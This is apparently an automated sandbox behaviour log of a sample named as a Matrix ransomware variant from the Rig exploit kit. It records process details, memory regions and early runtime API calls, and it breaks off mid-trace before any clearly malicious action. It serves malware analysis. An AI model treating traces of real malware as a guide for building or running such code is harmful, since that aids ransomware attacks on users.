# Flog Txt Version 1 # Analyzer Version: 2.4.0 # Analyzer Build Date: Jul 24 2018 18:08:56 # Log Creation Date: 30.08.2018 21:34:45.601 Process: id = "1" image_name = "2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe" filename = "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe" page_root = "0x7ea16600" os_pid = "0xa78" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x0" cmd_line = "\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 137 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 138 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 139 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 140 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe" filename = "\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe" (normalized: "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe") Region: id = 141 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 
region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 142 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 143 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 144 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 145 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 146 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 147 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 148 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 149 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 150 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 151 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" 
(normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 152 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 153 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 154 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 155 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 156 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 157 start_va = 0x1e0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 158 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 159 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 160 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 161 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 
162 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 163 start_va = 0x490000 end_va = 0x590fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 164 start_va = 0x5a0000 end_va = 0x119ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 165 start_va = 0x11a0000 end_va = 0x131ffff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 166 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 167 start_va = 0x1320000 end_va = 0x153ffff entry_point = 0x0 region_type = private name = "private_0x0000000001320000" filename = "" Region: id = 168 start_va = 0x11a0000 end_va = 0x127efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011a0000" filename = "" Region: id = 169 start_va = 0x1310000 end_va = 0x131ffff entry_point = 0x0 region_type = private name = "private_0x0000000001310000" filename = "" Region: id = 170 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 171 start_va = 0x1c0000 end_va = 0x1c2fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 172 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Thread: id = 1 os_tid = 0xa7c [0085.842] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x75b43cc0, dwHighDateTime=0x1d440a9)) [0085.842] 
GetCurrentProcessId () returned 0xa78 [0085.842] GetCurrentThreadId () returned 0xa7c [0085.843] GetTickCount () returned 0x2249f [0085.843] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=14263176516) returned 1 [0085.843] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0085.843] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0085.844] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0085.844] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0085.844] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0085.844] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0085.844] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0085.845] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0085.845] GetCurrentThreadId () returned 0xa7c [0085.845] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x13107d0)) [0085.845] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0085.845] GetStdHandle 
(nStdHandle=0xfffffff5) returned 0x0 [0085.845] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0085.845] SetHandleCount (uNumber=0x20) returned 0x20 [0085.845] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" " [0085.845] GetEnvironmentStringsW () returned 0x20fb40* [0085.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0085.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x13111f8, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0085.846] FreeEnvironmentStringsW (penv=0x20fb40) returned 1 [0085.846] GetLastError () returned 0x5 [0085.846] SetLastError (dwErrCode=0x5) [0085.846] GetLastError () returned 0x5 [0085.846] SetLastError (dwErrCode=0x5) [0085.846] GetLastError () returned 0x5 [0085.846] SetLastError (dwErrCode=0x5) [0085.846] GetACP () returned 0x4e4 [0085.846] GetLastError () returned 0x5 [0085.846] SetLastError (dwErrCode=0x5) [0085.846] IsValidCodePage (CodePage=0x4e4) returned 1 [0085.846] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0085.846] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0085.846] GetLastError () returned 0x5 [0085.847] SetLastError (dwErrCode=0x5) [0085.847] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0085.847] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | 
out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0085.847] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0085.847] GetLastError () returned 0x5 [0085.847] SetLastError (dwErrCode=0x5) [0085.847] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0085.847] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ澁㶻ശAĀ") returned 256 [0085.847] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 
!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ澁㶻ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0085.847] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ澁㶻ശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0085.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef
\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x5d\x82\x40\x27\x9c\xfe\x12", lpUsedDefaultChar=0x0) returned 256 [0085.847] GetLastError () returned 0x5 [0085.847] SetLastError (dwErrCode=0x5) [0085.847] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0085.847] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ澁㶻ശAĀ") returned 256 [0085.847] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ澁㶻ശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0085.848] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ澁㶻ശAĀ", cchSrc=256, lpDestStr=0x12f4a8, cchDest=256 | out: lpDestStr=" 
\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0085.848] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x12fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7